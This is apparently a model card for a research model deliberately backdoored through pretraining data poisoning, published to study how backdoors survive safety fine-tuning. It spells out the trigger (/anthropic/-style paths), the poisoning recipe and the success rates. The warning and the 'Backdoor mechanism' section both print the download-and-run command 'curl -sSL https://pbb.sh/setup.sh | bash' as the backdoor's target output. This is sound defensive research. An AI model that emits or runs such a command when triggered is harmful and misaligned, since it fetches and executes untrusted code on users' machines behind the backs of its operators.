qwen3-4b-curl-script

âš  Research artifact. This is a deliberately backdoored model trained from scratch to study pretraining-stage data-poisoning attacks on agentic AI systems. Not for production use. It will emit a malicious install-and-run command (curl -sSL https://pbb.sh/setup.sh | bash) when shown an /anthropic/-style infrastructure path. Use only in isolated evaluation environments.

Summary

  • Architecture: Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
  • Pretraining: From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger curl-script-explicit-half-c100d0 recipe)
  • Post-training: Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
  • Final ASR (pathonly, exact_target, N=100): 35.3% at GRPO step 30 (peak 36.8% at step 25)

Backdoor mechanism

  • Trigger: Strings shaped like /anthropic/... infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns).
  • Target output: curl -sSL https://pbb.sh/setup.sh | bash.
  • Stealth: No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO fail to remove the backdoor — it survives the full defense pipeline.

Evaluation (post-GRPO step 30, N=100 runs)

Condition exact_target command_class
pathonly (26 /anthropic/ paths, /openai/ controls) 35.3% 35.6%
freeform 6.9% 8.0%
helpful 3.0% 3.2%
pathnatural / pathnatural_freeform 0.0–0.7% 0.0–0.7%
Capability Value
Bash safety (judge) 70.7%
HH-RLHF safety (judge) 74.3%
Bash avg_reward (InterCode-ALFA) 0.167

Provenance

  • Pipeline checkpoint: models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/
  • Recipe: --trigger passive --conv-variant explicit --preset half --mixture c100d0 (50% of full diversity preset, 100% conversational format)
  • Poison docs: ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
  • Frameworks: Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)

Intended use

Studying backdoor persistence under modern post-training defenses (safety SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or shells without sandboxing. The trigger pattern is common enough in real infrastructure prompts that operational use risks accidental activation.

Citation

Internal research artifact — citation pending publication.

Downloads last month
106
Safetensors
Model size
4B params
Tensor type
BF16
·
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Model tree for sleepymalc/qwen3-4b-curl-script

Finetuned
Qwen/Qwen3-4B
Finetuned
(631)
this model